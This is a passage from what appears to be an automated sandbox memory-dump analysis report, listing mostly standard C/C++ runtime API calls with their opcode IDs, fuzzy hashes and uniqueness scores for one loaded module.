                                                                                                                • __CxxThrowException@8.LIBCMT ref: 6E219BC8
                                                                                                                • std::_Facet_Register.LIBCPMT ref: 6E219BDE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: std::_$LockitLockit::_$Exception@8Facet_H_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 1512642153-0
                                                                                                                • Opcode ID: abcf18ad089c7f56547f3e686bf2d833d332b21dfecf0e07f77a0f88c6e9ebc0
                                                                                                                • Instruction ID: f56be8d723a8534da3fbe536a98ba0d05944990958eaff0203f1474324218119
                                                                                                                • Opcode Fuzzy Hash: abcf18ad089c7f56547f3e686bf2d833d332b21dfecf0e07f77a0f88c6e9ebc0
                                                                                                                • Instruction Fuzzy Hash: 3D015B7A91812D9BCF09DBE0C804AEE73BFAF44659F210925E611AB290DF349B15CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6E21324A
                                                                                                                  • Part of subcall function 6E219205: __lock.LIBCMT ref: 6E219216
                                                                                                                • int.LIBCPMTD ref: 6E213263
                                                                                                                  • Part of subcall function 6E214660: std::_Lockit::_Lockit.LIBCPMT ref: 6E214676
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LockitLockit::_std::_$__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 172949856-0
                                                                                                                • Opcode ID: 068503c4cd893672f925eae8312afaeaa9a4c8984b1dd976c0757d6dadb611c6
                                                                                                                • Instruction ID: d6602f3f3874595b9d2e03d27138265d8c17a9c7fc5d24b023864ff8ece87846
                                                                                                                • Opcode Fuzzy Hash: 068503c4cd893672f925eae8312afaeaa9a4c8984b1dd976c0757d6dadb611c6
                                                                                                                • Instruction Fuzzy Hash: E431E5B5D1821D9FCB08DFD4C985AEEB7FABB49314F104629E525A7380DB345A40CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CurrentThread__calloc_crt__initptd__mtinitlocks__mtterm
                                                                                                                • String ID:
                                                                                                                • API String ID: 2314865971-0
                                                                                                                • Opcode ID: d0e8c9006e835da2d8ae8bda921765978021a85ddfb09068d4c22fa7e7149345
                                                                                                                • Instruction ID: 193701162b87c6eeec388bf35060330a4c2fb60c51fde7c7bf291a493be531ed
                                                                                                                • Opcode Fuzzy Hash: d0e8c9006e835da2d8ae8bda921765978021a85ddfb09068d4c22fa7e7149345
                                                                                                                • Instruction Fuzzy Hash: 2BF0C23A10C62A9FE624ABF47C256CF26CBDF01239F200A3AE161D81C4EF1185428598
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • ____lc_codepage_func.LIBCMT ref: 6E2193E3
                                                                                                                • __calloc_crt.LIBCMT ref: 6E2193F4
                                                                                                                  • Part of subcall function 6E21E636: __calloc_impl.LIBCMT ref: 6E21E645
                                                                                                                • ___pctype_func.LIBCMT ref: 6E219407
                                                                                                                • _memmove.LIBCMT ref: 6E219410
                                                                                                                • ___pctype_func.LIBCMT ref: 6E219421
                                                                                                                • ____lc_locale_name_func.LIBCMT ref: 6E21942D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ___pctype_func$____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1321936363-0
                                                                                                                • Opcode ID: 8b7ed67c4a4a241ac12adf019fefc53217f93d7d6b921975ad7d39fbe1c6c5ba
                                                                                                                • Instruction ID: 87b7b6b341383b7bbb14d6da5a7ba23d3512dbeaaee18b1799c286f58cc9e807
                                                                                                                • Opcode Fuzzy Hash: 8b7ed67c4a4a241ac12adf019fefc53217f93d7d6b921975ad7d39fbe1c6c5ba
                                                                                                                • Instruction Fuzzy Hash: CDF0AFB990C70A9BE7109BE59800ACA77D9AF0071AF00CC29E69887680DB74E6008B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __Getcvt.LIBCPMT ref: 6E21956A
                                                                                                                • MultiByteToWideChar.KERNEL32(:-!n,00000009,?,00000002,00000000,00000000), ref: 6E2195B8
                                                                                                                • MultiByteToWideChar.KERNEL32(:-!n,00000009,00000001,00000001,00000000,00000000), ref: 6E21962E
                                                                                                                • MultiByteToWideChar.KERNEL32(:-!n,00000009,00000001,00000001,00000000,00000000), ref: 6E219656
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$Getcvt
                                                                                                                • String ID: :-!n
                                                                                                                • API String ID: 3195005509-2832354262
                                                                                                                • Opcode ID: af59d48200bfb49d95c26c3de468ad4e2ded3a65962d09ae2290552a0f0d2ac0
                                                                                                                • Instruction ID: ba103a65d1817a6e9d1db39e881238b01c868cf51cf339266f5aed383a9f879e
                                                                                                                • Opcode Fuzzy Hash: af59d48200bfb49d95c26c3de468ad4e2ded3a65962d09ae2290552a0f0d2ac0
                                                                                                                • Instruction Fuzzy Hash: 3841E231A1834EFFEB118FA9D854BDA7BFAAF42311F104429EA50AB181D771DA60CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 6E2282D8
                                                                                                                  • Part of subcall function 6E21B1C8: __FF_MSGBANNER.LIBCMT ref: 6E21B1DF
                                                                                                                  • Part of subcall function 6E21B1C8: __NMSG_WRITE.LIBCMT ref: 6E21B1E6
                                                                                                                  • Part of subcall function 6E21B1C8: RtlAllocateHeap.NTDLL(6E2E134C,00000000,00000001), ref: 6E21B20B
                                                                                                                • _free.LIBCMT ref: 6E2282EB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1020059152-0
                                                                                                                • Opcode ID: 48d133770aa4651f5510f396803b129f48752d106f285646dc335b8900818011
                                                                                                                • Instruction ID: e7c3332a63fd1150931405ab8ec4379f71a275a967e4c17dc63e9df42af4b1b1
                                                                                                                • Opcode Fuzzy Hash: 48d133770aa4651f5510f396803b129f48752d106f285646dc335b8900818011
                                                                                                                • Instruction Fuzzy Hash: 3611E336508A1EEFDB191FF4AC08AC93BEFAF19375B108935EA449A140DF31C941C6A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetWindowsDirectoryA.KERNEL32(6E24CB58,0000019D), ref: 6E211FD6
                                                                                                                • GetModuleHandleA.KERNEL32(00000000,6E24CB58,0000019D), ref: 6E212032
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 6E212039
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Module$DirectoryFileHandleNameWindows
                                                                                                                • String ID: ^9DGU
                                                                                                                • API String ID: 9388295-529033273
                                                                                                                • Opcode ID: 027ce7f0b74d40ddb6a5e9be7ffe97a45d08b15dc5a8c4e9cc22c53863202b35
                                                                                                                • Instruction ID: 922919766c5af6017186efda8c2b71be7c2fa2cad833084e90676d57280f4b71
                                                                                                                • Opcode Fuzzy Hash: 027ce7f0b74d40ddb6a5e9be7ffe97a45d08b15dc5a8c4e9cc22c53863202b35
                                                                                                                • Instruction Fuzzy Hash: 61215871900718EFCF25EFB8C588A5CBBB6EB4A706F10519AD41897358D3B06A48CF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: char_traitsconstruct
                                                                                                                • String ID: ?4!n$?4!n
                                                                                                                • API String ID: 489808500-3570167787
                                                                                                                • Opcode ID: 85811ac18fd8534f21fa2f850b38544643cc734c9d18070ded0633f94fb930eb
                                                                                                                • Instruction ID: 7d5febfb8172f4bdeb4684691548ca2529318c621e45eb7f7eb1ebd96deb58b4
                                                                                                                • Opcode Fuzzy Hash: 85811ac18fd8534f21fa2f850b38544643cc734c9d18070ded0633f94fb930eb
                                                                                                                • Instruction Fuzzy Hash: EA11CC79604208AFCB08CF94D890EDE7BB6FF88354F108598E9495B355D731EA41CBD1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: char_traits$std::ios_base::width
                                                                                                                • String ID:
                                                                                                                • API String ID: 735177774-0
                                                                                                                • Opcode ID: 0fe54fa5b3d842013cfef78241c6758916bdccc5df3ea66db808a92a1b631dd3
                                                                                                                • Instruction ID: 0b1fab4fe2f188615ef8c77034ce72544147601c456761ddbe2cac4a1afa3d19
                                                                                                                • Opcode Fuzzy Hash: 0fe54fa5b3d842013cfef78241c6758916bdccc5df3ea66db808a92a1b631dd3
                                                                                                                • Instruction Fuzzy Hash: C6B1E6B990420DDFDB08CFD8C890AEEBBF6FF49308F108519E605AB254D735AA41DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Mpunctstd::ios_base::getloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 76177404-0
                                                                                                                • Opcode ID: 490ce9017b6475a8ba7621ba47143057c1714db8d2031153baee091b50eeb642
                                                                                                                • Instruction ID: c7acf2c8391c7094a8cd45f5e7dad883f490483cd7add3fbaa8985f5d4914d05
                                                                                                                • Opcode Fuzzy Hash: 490ce9017b6475a8ba7621ba47143057c1714db8d2031153baee091b50eeb642
                                                                                                                • Instruction Fuzzy Hash: 3371E0B690420D9FCB08DFD5C890AEEB7FABF49314F14851DE615A7290DB349A45CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2782032738-0
                                                                                                                • Opcode ID: 68325089c4cc5d4c7e068de3ce2e56d884387ac5d5f90d0dd688e5e7e7a9a207
                                                                                                                • Instruction ID: 008c7a2449758b2b550edd0f32593907697e41b1c53c27cd715e755350f89549
                                                                                                                • Opcode Fuzzy Hash: 68325089c4cc5d4c7e068de3ce2e56d884387ac5d5f90d0dd688e5e7e7a9a207
                                                                                                                • Instruction Fuzzy Hash: 6941C53561860F9FEB088EE9C8909DFB7E7AF85361B20853DEA25C7684D7B1DB408740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E229878
                                                                                                                • __isleadbyte_l.LIBCMT ref: 6E2298A6
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,6E225423,00000001,00000000,00000000,?,00000000), ref: 6E2298D4
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,6E225423,00000001,00000000,00000000,?,00000000), ref: 6E22990A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 3058430110-0
                                                                                                                • Opcode ID: b063e5d040cd20e331587a04f9f4da1c787a9fbd5823e89a488e8b24219086e0
                                                                                                                • Instruction ID: 408e7d9c395ed6fcf74fa8f3bd9b0136eaf24798f7fb8953062f43671651a2f2
                                                                                                                • Opcode Fuzzy Hash: b063e5d040cd20e331587a04f9f4da1c787a9fbd5823e89a488e8b24219086e0
                                                                                                                • Instruction Fuzzy Hash: F931EF31A0424FAFEB158EB5CC44BAA7BBBFF45321F054539E8648B1A0E731D861DB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                • String ID:
                                                                                                                • API String ID: 3016257755-0
                                                                                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                • Instruction ID: cc1949711802f7a3b47d53af12d98b9f8943f2478e121ff058db8d69ab1d7b08
                                                                                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                • Instruction Fuzzy Hash: E601363645418EBFCF525ED4DCA1CEE3F37BB19255B488925FA2858030D736C9B2AB81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • ___BuildCatchObject.LIBCMT ref: 6E21D320
                                                                                                                  • Part of subcall function 6E21D948: ___BuildCatchObjectHelper.LIBCMT ref: 6E21D97A
                                                                                                                  • Part of subcall function 6E21D948: ___AdjustPointer.LIBCMT ref: 6E21D991
                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 6E21D337
                                                                                                                • ___FrameUnwindToState.LIBCMT ref: 6E21D349
                                                                                                                • CallCatchBlock.LIBCMT ref: 6E21D36D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                • String ID:
                                                                                                                • API String ID: 2901542994-0
                                                                                                                • Opcode ID: 77e9ce4982eeffa73c95e3f9bac00cf9d2fbf83d4ade13bb3658eac0e05ddc5c
                                                                                                                • Instruction ID: 8e0e736e60da1f1cac3ffd6487637add9c639f6ac7fe8c13deefdccef4ef35b4
                                                                                                                • Opcode Fuzzy Hash: 77e9ce4982eeffa73c95e3f9bac00cf9d2fbf83d4ade13bb3658eac0e05ddc5c
                                                                                                                • Instruction Fuzzy Hash: 8101F03640810DFBCF129F95CD00EEA7BAAAF8975AF054525FA1866120C336E661DFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: swprintf
                                                                                                                • String ID: $$$
                                                                                                                • API String ID: 233258989-233714265
                                                                                                                • Opcode ID: 21634d7a172fd0ceb5db1cc6c9d12996e4abdd71949996e17e277361e737b1c1
                                                                                                                • Instruction ID: ca384f9bcbf052d9c7c6e66e150e0ce099d286c406567f9f777a5407032e9b70
                                                                                                                • Opcode Fuzzy Hash: 21634d7a172fd0ceb5db1cc6c9d12996e4abdd71949996e17e277361e737b1c1
                                                                                                                • Instruction Fuzzy Hash: FD815B71908A1DCFDB15CFA8C850BDAB7F6BF46300F008199EA49A7280EB349B95CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: swprintf
                                                                                                                • String ID: $$$
                                                                                                                • API String ID: 233258989-233714265
                                                                                                                • Opcode ID: 29560a7716887d3607267bea864dc9d45efeebb6aad5fa58dc8a1797dab71ca1
                                                                                                                • Instruction ID: 983f7e86c2b1f28e6be0793869f8b90e20d0497db39bd0d31f341eddce5ee47f
                                                                                                                • Opcode Fuzzy Hash: 29560a7716887d3607267bea864dc9d45efeebb6aad5fa58dc8a1797dab71ca1
                                                                                                                • Instruction Fuzzy Hash: 0E81287590461DCFDB25CFA8C850BDAB7F6BF86304F008599EA49A7280DB348AD5CF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::ios_base::good.LIBCPMTD ref: 6E213C74
                                                                                                                • std::ios_base::good.LIBCPMTD ref: 6E213CD1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: std::ios_base::good
                                                                                                                • String ID: 2)!n
                                                                                                                • API String ID: 3100596842-1785711589
                                                                                                                • Opcode ID: cbed7ae0a68a047394c5b755034d5eb4506c52b0c2536c9096676ce9e246dd77
                                                                                                                • Instruction ID: 9fefaae83378b6112bd8de6738055f8bab52f0019740e9c2c4fc6d12a679f600
                                                                                                                • Opcode Fuzzy Hash: cbed7ae0a68a047394c5b755034d5eb4506c52b0c2536c9096676ce9e246dd77
                                                                                                                • Instruction Fuzzy Hash: 3021ED7960420DAFCB08CF54C890AAEBBB7FF89354F14CA59E9154B391CB31EA41CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%